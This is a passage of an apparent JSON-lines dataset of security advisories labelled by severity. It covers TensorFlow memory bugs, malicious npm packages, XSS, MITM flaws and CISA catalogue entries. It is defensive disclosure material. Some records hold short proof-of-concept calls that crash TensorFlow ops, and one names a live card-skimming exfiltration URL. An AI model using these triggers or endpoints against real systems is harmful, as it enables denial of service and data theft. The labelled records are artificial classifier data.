tf.constant((0.0), dtype=tf.float32)]\n\nexample_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], dtype=tf.float32)\n\ntf.raw_ops.SdcaOptimizer(\n sparse_example_indices=sparse_example_indices,\n sparse_feature_indices=sparse_feature_indices,\n sparse_feature_values=sparse_feature_values, dense_features=dense_features,\n example_weights=example_weights, example_labels=example_labels, \n sparse_indices=sparse_indices, sparse_weights=sparse_weights, \n dense_weights=dense_weights, example_state_data=example_state_data,\n loss_type=\"logistic_loss\", l1=0.0, l2=0.0, num_loss_partitions=1,\n num_inner_iterations=1, adaptative=False)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/60a45c8b6192a4699f2e2709a2645a751d435cc3/tensorflow/core/kernels/sdca_internal.cc) does not validate that the user supplied arguments satisfy all [constraints expected by the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/SdcaOptimizer).\n\n### Patches\nWe have patched the issue in GitHub commit [f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb](https://github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "text_raw": "Reference binding to nullptr in `SdcaOptimizer`\n\n[Severity: LOW]\n\n### Impact\nThe implementation of `tf.raw_ops.SdcaOptimizer` triggers undefined behavior due to dereferencing a null pointer:\n\n```python\nimport tensorflow as tf\n\nsparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_feature_values = []\n\ndense_features = []\ndense_weights = []\n\nexample_weights = tf.constant((0.0), dtype=tf.float32)\nexample_labels = tf.constant((0.0), dtype=tf.float32)\n\nsparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)]\n \nexample_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], dtype=tf.float32)\n \ntf.raw_ops.SdcaOptimizer(\n sparse_example_indices=sparse_example_indices,\n sparse_feature_indices=sparse_feature_indices,\n sparse_feature_values=sparse_feature_values, dense_features=dense_features,\n example_weights=example_weights, example_labels=example_labels, \n sparse_indices=sparse_indices, sparse_weights=sparse_weights, \n dense_weights=dense_weights, example_state_data=example_state_data,\n loss_type=\"logistic_loss\", l1=0.0, l2=0.0, num_loss_partitions=1,\n num_inner_iterations=1, adaptative=False)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/60a45c8b6192a4699f2e2709a2645a751d435cc3/tensorflow/core/kernels/sdca_internal.cc) does not validate that the user supplied arguments satisfy all [constraints expected by the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/SdcaOptimizer).\n\n### Patches\nWe have patched the issue in GitHub commit [f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb](https://github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "8239003fc305cc055934", "text": "Missing Authentication for Critical Function in Apache Calcite\n\n\"HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses this method internally to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.\"", "text_raw": "Missing Authentication for Critical Function in Apache Calcite\n\n[Severity: MEDIUM]\n\n\"HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses this method internally to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.\"", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-22", "split": "train"} -{"id": "18a69f6861a210972e4d", "text": "Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept", "text_raw": "Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2010-02-22", "split": "train"} -{"id": "f5a0d400b61be65afeb7", "text": "Action Commands (run/shell/exec) Against Library URIs Ignore Configured Remote Endpoint\n\n# Impact\nDue to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint.\n\nAn attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container.\n\nOnly action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint.\n\n# Patches\nAll users should upgrade to Singularity 3.7.4 or later.\n\n# Workarounds\nUsers who only interact with the default remote endpoint or do not use the library:// url are not affected.\n\nInstallations with an execution control list configured to restrict execution to containers signed with specific secure keys are not affected.\n\n# Acknowledgements\nThis issue was found by Mike Frisch and brought to our attention by Sylabs. Sylabs is making a [coordinated disclosure](https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394).\n\n# For more information\nGeneral questions about the impact of the advisory can be asked in the:\n\n[Singularity Slack Channel](https://join.slack.com/t/hpcng/shared_invite/zt-qda4h1ls-OP0Uouq6sSmVE6i_0NrWdw)\n[Singularity Mailing List](https://groups.google.com/a/lbl.gov/g/singularity)\nAny sensitive security concerns should be directed to: [singularity-security@hpcng.org](mailto:singularity-security@hpcng.org)", "text_raw": "Action Commands (run/shell/exec) Against Library URIs Ignore Configured Remote Endpoint\n\n[Severity: MEDIUM]\n\n# Impact\nDue to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint.\n\nAn attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container.\n\nOnly action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint.\n\n# Patches\nAll users should upgrade to Singularity 3.7.4 or later.\n\n# Workarounds\nUsers who only interact with the default remote endpoint or do not use the library:// url are not affected.\n\nInstallations with an execution control list configured to restrict execution to containers signed with specific secure keys are not affected.\n\n# Acknowledgements\nThis issue was found by Mike Frisch and brought to our attention by Sylabs. Sylabs is making a [coordinated disclosure](https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394).\n\n# For more information\nGeneral questions about the impact of the advisory can be asked in the:\n\n[Singularity Slack Channel](https://join.slack.com/t/hpcng/shared_invite/zt-qda4h1ls-OP0Uouq6sSmVE6i_0NrWdw)\n[Singularity Mailing List](https://groups.google.com/a/lbl.gov/g/singularity)\nAny sensitive security concerns should be directed to: [singularity-security@hpcng.org](mailto:singularity-security@hpcng.org)\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-01", "split": "train"} -{"id": "c68d9dfb177f14b541e1", "text": "Cross-site Scripting in tempura\n\nThis affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.", "text_raw": "Cross-site Scripting in tempura\n\n[Severity: MEDIUM]\n\nThis affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-08", "split": "train"} -{"id": "7f5cabb81d6c5099fae8", "text": "SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit", "text_raw": "SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2017-02-11", "split": "train"} -{"id": "faf0c0904a712f8e9719", "text": "Erroneous Proof of Work calculation in geth\n\n### Impact\nAn ethash mining DAG generation flaw in Geth could cause miners to erroneously calculate PoW in an upcoming epoch (estimated early January, 2021). This happened on the ETC chain on 2020-11-06. This issue is relevant only for miners, non-mining nodes are unaffected.\n\n### Patches\nThis issue is also fixed as of 1.9.24. Thanks to @slavikus for bringing the issue to our attention and writing the fix.\n\n### Workarounds\nThis PR implements a patch: https://github.com/ethereum/go-ethereum/pull/21793\n\n### References\nhttps://blog.ethereum.org/2020/11/12/geth_security_release/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum)\n* Email us at [security@ethereum.org](mailto:security@ethereum.org)", "text_raw": "Erroneous Proof of Work calculation in geth\n\n[Severity: MEDIUM]\n\n### Impact\nAn ethash mining DAG generation flaw in Geth could cause miners to erroneously calculate PoW in an upcoming epoch (estimated early January, 2021). This happened on the ETC chain on 2020-11-06. This issue is relevant only for miners, non-mining nodes are unaffected.\n\n### Patches\nThis issue is also fixed as of 1.9.24. Thanks to @slavikus for bringing the issue to our attention and writing the fix. \n\n### Workarounds\nThis PR implements a patch: https://github.com/ethereum/go-ethereum/pull/21793 \n\n### References\nhttps://blog.ethereum.org/2020/11/12/geth_security_release/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum)\n* Email us at [security@ethereum.org](mailto:security@ethereum.org)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-29", "split": "train"} -{"id": "242ae47838a5da9eb28b", "text": "Heap buffer overflow in `RaggedBinCount`\n\n### Impact\nIf the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\ntf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)\n```\n\nThis will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L433):\n\n```cc\n for (int idx = 0; idx < num_values; ++idx) {\n while (idx >= splits(batch_idx)) {\n batch_idx++;\n }\n ...\n }\n```\n\nBefore the `for` loop, `batch_idx` is set to 0. The user controls the `splits` array, making it contain only one element, 0. Thus, the code in the `while` loop would increment `batch_idx` and then try to read `splits(1)`, which is outside of bounds.\n\n### Patches\nWe have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Heap buffer overflow in `RaggedBinCount`\n\n[Severity: LOW]\n\n### Impact\nIf the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\ntf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)\n```\n\nThis will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L433):\n\n```cc\n for (int idx = 0; idx < num_values; ++idx) {\n while (idx >= splits(batch_idx)) {\n batch_idx++;\n }\n ...\n }\n```\n\nBefore the `for` loop, `batch_idx` is set to 0. The user controls the `splits` array, making it contain only one element, 0. Thus, the code in the `while` loop would increment `batch_idx` and then try to read `splits(1)`, which is outside of bounds.\n\n### Patches\nWe have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "aa9a977459c400cfa908", "text": "Ruby on Rails vulnerable to code injection\n\nRuby on Rails before 1.1.5 allows remote attackers to execute Ruby code with \"severe\" or \"serious\" impact via a File Upload request with an HTTP header that modifies the LOAD_PATH variable, a different vulnerability than CVE-2006-4112.", "text_raw": "Ruby on Rails vulnerable to code injection\n\n[Severity: HIGH]\n\nRuby on Rails before 1.1.5 allows remote attackers to execute Ruby code with \"severe\" or \"serious\" impact via a File Upload request with an HTTP header that modifies the LOAD_PATH variable, a different vulnerability than CVE-2006-4112.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "f884d835fbe36a06e33e", "text": "Lookup function information discolosure in helm\n\nThe Helm core maintainers have identified an information disclosure vulnerability in Helm 3.0.0-3.1.2.\n\n### Impact\n\n`lookup` is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates.\n\nThe documented behavior of `helm template` states that it does not attach to a remote cluster. However, as the recently added `lookup` template function circumvents this restriction and connects to the cluster even during `helm template` and `helm install|update|delete|rollback --dry-run`. The user is not notified of this behavior.\n\nRunning `helm template` should not make calls to a cluster. This is different from `install`, which is presumed to have access to a cluster in order to load resources into Kubernetes. Helm 2 is unaffected by this vulnerability.\n\nA malicious chart author could inject a `lookup` into a chart that, when rendered through `helm template`, performs unannounced lookups against the cluster a user's `KUBECONFIG` file points to. This information can then be disclosed via the output of `helm template`.\n\n### Patches\n\nThis issue has been fixed in Helm 3.2.0\n\n### Workarounds\n\nDue to another bug (also fixed in Helm 3.2.0), the command `helm lint` will fail with an error if the `lookup` function is used in a chart. Therefore, run `helm lint` on an untrusted chart before running `helm template`.\n\nAlternately, setting the `KUBECONFIG` environment variable to point to an empty Kubernetes configuration file will prevent unintended network connections.\n\nFinally, a chart may be manually analyzed for the presence of a `lookup` function in any file in the `templates/` directory.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the Helm repository](https://github.com/helm/helm/issues)\n* For security-specific issues, email us at [cncf-helm-security@lists.cncf.io](mailto:cncf-helm-security@lists.cncf.io)", "text_raw": "Lookup function information discolosure in helm\n\n[Severity: HIGH]\n\nThe Helm core maintainers have identified an information disclosure vulnerability in Helm 3.0.0-3.1.2. \n\n### Impact\n\n`lookup` is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates.\n\nThe documented behavior of `helm template` states that it does not attach to a remote cluster. However, as the recently added `lookup` template function circumvents this restriction and connects to the cluster even during `helm template` and `helm install|update|delete|rollback --dry-run`. The user is not notified of this behavior.\n\nRunning `helm template` should not make calls to a cluster. This is different from `install`, which is presumed to have access to a cluster in order to load resources into Kubernetes. Helm 2 is unaffected by this vulnerability.\n\nA malicious chart author could inject a `lookup` into a chart that, when rendered through `helm template`, performs unannounced lookups against the cluster a user's `KUBECONFIG` file points to. This information can then be disclosed via the output of `helm template`.\n\n### Patches\n\nThis issue has been fixed in Helm 3.2.0\n\n### Workarounds\n\nDue to another bug (also fixed in Helm 3.2.0), the command `helm lint` will fail with an error if the `lookup` function is used in a chart. Therefore, run `helm lint` on an untrusted chart before running `helm template`.\n\nAlternately, setting the `KUBECONFIG` environment variable to point to an empty Kubernetes configuration file will prevent unintended network connections.\n\nFinally, a chart may be manually analyzed for the presence of a `lookup` function in any file in the `templates/` directory. \n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the Helm repository](https://github.com/helm/helm/issues)\n* For security-specific issues, email us at [cncf-helm-security@lists.cncf.io](mailto:cncf-helm-security@lists.cncf.io)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-27", "split": "train"} -{"id": "08ed31c5d3564005f57d", "text": "node-sqlite is malware\n\nThe `node-sqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.\n\nAll versions have been unpublished from the npm registry.\n\n## Recommendation\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.\n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.\n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "text_raw": "node-sqlite is malware\n\n[Severity: HIGH]\n\nThe `node-sqlite` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. \n\nAll versions have been unpublished from the npm registry.\n\n\n## Recommendation\n\n\n\n\nAs this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. \n\nIf you have found this installed in your environment, you should:\n1. Delete the package\n2. Clear your npm cache\n3. Ensure it is not present in any other package.json files on your system\n4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. \n\nAdditionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "27d2cbe1af6f33854d41", "text": "Malicious Package in codify\n\nVersion 0.3.1 of `codify` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 0.3.1 of this module is found installed you will want to replace it with a version before or after 0.3.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in codify\n\n[Severity: CRITICAL]\n\nVersion 0.3.1 of `codify` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nIf version 0.3.1 of this module is found installed you will want to replace it with a version before or after 0.3.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "f9b9417fd0ec6c4614cf", "text": "MySource Matrix 3.28.3 (height) Remote Reflected XSS Vulnerability", "text_raw": "MySource Matrix 3.28.3 (height) Remote Reflected XSS Vulnerability\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2010-09-06", "split": "train"} -{"id": "72a06403b503b4e75db1", "text": "Microsoft Win32k Privilege Escalation Vulnerability\n\nAffected: Microsoft Win32k\n\nMicrosoft Win32k kernel-mode driver fails to properly handle objects in memory which allows for privilege escalation. Successful exploitation allows an attacker to run code in kernel mode.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-264\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Win32k Privilege Escalation Vulnerability\n\nAffected: Microsoft Win32k\n\nMicrosoft Win32k kernel-mode driver fails to properly handle objects in memory which allows for privilege escalation. Successful exploitation allows an attacker to run code in kernel mode.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-264\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "6d0e38fe3b3c10d9331b", "text": "Malicious Package in owl-orchard-apple-sunshine\n\nAll versions of `owl-orchard-apple-sunshine` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in owl-orchard-apple-sunshine\n\n[Severity: CRITICAL]\n\nAll versions of `owl-orchard-apple-sunshine` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "96c0e0a4afeaca4b812c", "text": "Using ktlint to download and execute custom rulesets can result in arbitrary code execution as the served jars can be compromised by a MITM. This attack is exploitable via Man in the Middle of the HTTP connection to the artifact servers. This vulnerability appears to have been fixed in 0.30.0 and later; after commit 5e547b287d6c260d328a2cb658dbe6b7a7ff2261.", "text_raw": "High severity vulnerability that affects com.github.shyiko.ktlint:ktlint-core\n\n[Severity: HIGH]\n\nUsing ktlint to download and execute custom rulesets can result in arbitrary code execution as the served jars can be compromised by a MITM. This attack is exploitable via Man in the Middle of the HTTP connection to the artifact servers. This vulnerability appears to have been fixed in 0.30.0 and later; after commit 5e547b287d6c260d328a2cb658dbe6b7a7ff2261.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-08", "split": "train"} -{"id": "42855f4ff5165136bdff", "text": "FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure", "text_raw": "FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-10-06", "split": "train"} -{"id": "4a8712ad2c52ff7261d6", "text": "TaffyDB can allow access to any data items in the DB\n\nTaffyDB allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. Taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, TaffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB. **Note:** `taffy` and its successor package `taffydb` are not maintained.", "text_raw": "TaffyDB can allow access to any data items in the DB\n\n[Severity: HIGH]\n\nTaffyDB allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. Taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, TaffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB. **Note:** `taffy` and its successor package `taffydb` are not maintained.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-02-19", "split": "train"} -{"id": "cf7342890577057d2179", "text": "Mozilla Firefox And Thunderbird Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox and Thunderbird\n\nMozilla Firefox and Thunderbird contain a race condition vulnerability when running the nsDocShell destructor under certain conditions. The race condition creates a use-after-free vulnerability, causing unspecified impacts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-362, CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Mozilla Firefox And Thunderbird Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox and Thunderbird\n\nMozilla Firefox and Thunderbird contain a race condition vulnerability when running the nsDocShell destructor under certain conditions. The race condition creates a use-after-free vulnerability, causing unspecified impacts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-362, CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "78d135b92b4070a48404", "text": "Downloads Resources over HTTP in mystem-wrapper\n\nAffected versions of `mystem-wrapper` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `mystem-wrapper`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in mystem-wrapper\n\n[Severity: HIGH]\n\nAffected versions of `mystem-wrapper` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `mystem-wrapper`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "d62c71a83939ca780751", "text": "Cross-Site Scripting in BookStack\n\n### Impact\n\nA user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to others users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore ran on other user machines.\n\nThis most impacts scenarios where not-trusted users are given permission to create comments.\n\n### Patches\n\nThe issue was addressed in BookStack v0.29.2.\n\nAfter upgrading, The command `php artisan bookstack:regenerate-comment-content` should be ran to remove any pre-existing dangerous content.\n\n### Workarounds\n\nComments can be disabled in the system settings to prevent them being shown to users. Alternatively, comment creation permissions can be altered as required to only those who are trusted but this will not address existing exploitation of this vulnerability.\n\n### References\n\n* [BookStack Beta v0.29.2](https://github.com/BookStackApp/BookStack/releases/tag/v0.29.2)\n* JVN#41035278\n* [BookStack Blog Post](https://bookstackapp.com/blog/beta-release-v0-29-2/)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [the BookStack GitHub repository](BookStackApp/BookStack/issues).\n* Ask on the [BookStack Discord chat](https://discord.gg/ztkBqR2).\n* Follow the [BookStack Security Advice](https://github.com/BookStackApp/BookStack#-security) to contact someone privately.", "text_raw": "Cross-Site Scripting in BookStack\n\n[Severity: MEDIUM]\n\n### Impact\n\nA user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to others users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore ran on other user machines.\n\nThis most impacts scenarios where not-trusted users are given permission to create comments.\n\n### Patches\n\nThe issue was addressed in BookStack v0.29.2.\n\nAfter upgrading, The command `php artisan bookstack:regenerate-comment-content` should be ran to remove any pre-existing dangerous content. \n\n### Workarounds\n\nComments can be disabled in the system settings to prevent them being shown to users. Alternatively, comment creation permissions can be altered as required to only those who are trusted but this will not address existing exploitation of this vulnerability. \n\n### References\n\n* [BookStack Beta v0.29.2](https://github.com/BookStackApp/BookStack/releases/tag/v0.29.2)\n* JVN#41035278\n* [BookStack Blog Post](https://bookstackapp.com/blog/beta-release-v0-29-2/)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [the BookStack GitHub repository](BookStackApp/BookStack/issues).\n* Ask on the [BookStack Discord chat](https://discord.gg/ztkBqR2).\n* Follow the [BookStack Security Advice](https://github.com/BookStackApp/BookStack#-security) to contact someone privately.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-05-07", "split": "train"} -{"id": "c67d6c47f5916189472c", "text": "Origin Validation Error in Apache Maven\n\nApache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available in the referenced urls. If you are currently using a repository manager to govern the repositories used by your builds, you are unaffected by the risks present in the legacy behavior, and are unaffected by this vulnerability and change to default behavior. See this link for more information about repository management: https://maven.apache.org/repository-management.html", "text_raw": "Origin Validation Error in Apache Maven\n\n[Severity: CRITICAL]\n\nApache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may 